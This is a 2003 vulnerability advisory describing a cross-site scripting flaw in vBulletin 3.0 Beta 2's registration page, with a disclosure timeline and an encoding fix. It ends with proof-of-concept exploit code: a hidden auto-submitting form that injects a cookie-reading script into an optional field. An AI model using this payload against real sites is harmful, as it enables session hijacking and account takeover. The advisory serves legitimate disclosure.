------------------------------------------------------ VBulletin New Member XSS Vulnerability ------------------------------------------------------ Any kind of XSS attacks possibility. With this vuln. an attacker could access other users/admins accounts. Online URL : http://ferruh.mavituna.com/article.asp?256 ------------------------------------------------------ About VBulletin; ------------------------------------------------------ PHP Based Popular Forum Application Vendor & Demo; www.vbulletin.com ------------------------------------------------------ Description; ------------------------------------------------------ In new member page (register.php), If you skip a required field system redirect you same form and fill fields automaticly that you enter before for a better form. In standard fields Vbulletin successfully handle script injections. But in optional fields like "Interests-Hobbies", "Biography", "Occupation" etc... So you can execute any JS with this fields. ------------------------------------------------------ Vulnerable; ------------------------------------------------------ vBulletin 3.0 Beta 2 ------------------------------------------------------ Non Vulnerable; ------------------------------------------------------ vBulletin 2.3.0 vBulletin 2.2.8 ... ------------------------------------------------------ Vendor Status; ------------------------------------------------------ No answer at the moment. ------------------------------------------------------ History ------------------------------------------------------ Discovered : 15.07.2003 Vendor Informed : 29.07.2003 Publihed : 06.08.2003 ------------------------------------------------------ Solution; ------------------------------------------------------ HTML Encoding like other inputs is OK. ------------------------------------------------------ Exploit Code; ------------------------------------------------------ [form action="http://[victim]/register.php?do=register" method="post" style="display:none"] [input type="hidden" name="s" value="" /] [input type="hidden" name="regtype" value="1" /] [input type="text" class="bginput" name="field1" value="" size="25" maxlength="250" /] [input type="hidden" name="url" value="index.php" /] [input type="hidden" name="do" value="addmember" /] [/form] [script] //Code that will be executed var xss = "\"][script]alert(document"+".cookie)[\/script]"; document.forms[0].field1.value=xss; document.forms[0].submit(); [/script] *Replace ([],<>) Ferruh Mavituna ferruh@mavituna.com http://ferruh.mavituna.com Web Application Security Specialist